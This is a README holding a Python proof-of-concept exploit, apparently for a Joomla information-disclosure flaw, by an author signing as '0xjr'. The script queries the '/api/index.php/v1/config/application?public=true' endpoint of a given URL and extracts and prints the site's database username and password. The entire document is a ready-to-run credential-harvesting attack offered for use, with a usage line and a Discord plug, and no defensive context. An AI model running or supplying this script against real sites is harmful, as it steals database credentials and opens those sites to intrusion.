README.md
Rendering markdown...
#!/usr/bin/python3
# usage: python3 exploit.py http://<url>
# 0xjr: join the discord, link in github bio
import requests
import sys
from colorama import Fore, init
import json
from urllib.parse import urljoin
init(autoreset=True)
# banner
banner = """
__ __ __
/ /___ ____ ____ ___ / /___ _/ /
__ / / __ \/ __ \/ __ `__ \/ / __ `/ /
/ /_/ / /_/ / /_/ / / / / / / / /_/ /_/
\____/\____/\____/_/ /_/ /_/_/\__,_(_)
PoC By: 0xjr
Join the discord! Link in my github bio!
"""
print(f"{Fore.BLUE}{banner}")
def get_url(base_url):
try:
api_path = "/api/index.php/v1/config/application?public=true"
url = urljoin(base_url, api_path)
print(f"{Fore.BLUE}[~] Info: Trying, {url}.")
response = requests.get(url)
response.raise_for_status()
data = response.json()
def find_keys(node, keys):
if isinstance(node, dict):
for k, v in node.items():
if k in keys:
keys[k] = v
if isinstance(v, (dict, list)):
find_keys(v, keys)
elif isinstance(node, list):
for item in node:
find_keys(item, keys)
keys = {"user": None, "password": None}
find_keys(data, keys)
if keys["user"] and keys["password"]:
print(f"{Fore.GREEN}[+] Success: Found username: {keys['user']}")
print(f"{Fore.GREEN}[+] Success: Found password: {keys['password']}")
else:
print(f"{Fore.YELLOW}[!] Warning: Sensitive information not found in the response.")
except requests.ConnectionError as e:
print(f"{Fore.RED}[-] Error: {e}")
except requests.HTTPError as e:
print(f"{Fore.RED}[-] HTTP Error: {e}")
except json.JSONDecodeError as e:
print(f"{Fore.RED}[-] JSON Decode Error: {e}")
except Exception as e:
print(f"{Fore.RED}[-] An unexpected error occurred: {e}")
if __name__ == "__main__":
if len(sys.argv) != 2:
print(f"{Fore.RED}[-] Usage: python3 {sys.argv[0]} http://<url>")
sys.exit(1)
base_url = sys.argv[1]
get_url(base_url)